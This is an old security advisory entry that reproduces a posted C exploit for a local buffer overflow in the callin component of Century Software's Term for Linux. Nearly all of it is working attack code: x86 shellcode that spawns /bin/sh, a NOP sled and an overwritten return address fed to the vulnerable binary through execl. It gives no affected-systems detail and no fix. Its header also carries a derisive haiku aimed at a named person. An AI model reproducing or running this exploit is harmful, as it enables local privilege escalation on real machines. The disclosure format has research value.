27th Feb 2002 [SBWID-5144]
COMMAND
Century's Linux Term local buffer overflow
SYSTEMS AFFECTED
??
PROBLEM
Haiku Hacker posted:
/********************************************************/
/* ex-callin.c - Haiku Hacker <haiku@hushmail.com> */
/* Exploits the buffer overflow in Century Software's */
/* calling component of the Term program for Linux. */
/********************************************************/
/* Greets, love, and respect to: */
/* KF, Merc, Synapse, UPT old and new, Lance Spitzner, */
/* egami, comega, jericho, and most importantly sl1k */
/* for his guidance, coaching, and tutoring. */
/********************************************************/
/* RFP's Pants */
/* ----------- */
/* Rain Forest Puppy */
/* Wears tight black pants to big cons */
/* Does he have limp wrist? */
/********************************************************/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h> /* execl() */

/* use this to specify the location of callin */
#define CINPATH "./callin"

int main(int argc, char **argv)
{
    /* Shellcode borrowed from Aleph1 */
    char shellcode[] =
        "\x29\xc0\x29\xdb\x29\xc9\x29\xd2\xb0\xa4\xcd\x80"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/sh";
    char egg_string[300];
    int i;
    unsigned long offset = 0;

    if (argc > 1)
    {
        offset = atoi(argv[1]);
    }
    memcpy(egg_string, "tty", 3);
    for (i = 3; i < 95; i++)
        egg_string[i] = 'A';
    *(long *)(egg_string+95) = 0xbffff67c + offset;
    for (i = 99; i < 300; i++)
        egg_string[i] = 0x90;
    strcpy(egg_string+(sizeof(egg_string)-strlen(shellcode)), shellcode);
    execl(CINPATH, "callin", egg_string, (char *)NULL);
}
SOLUTION
??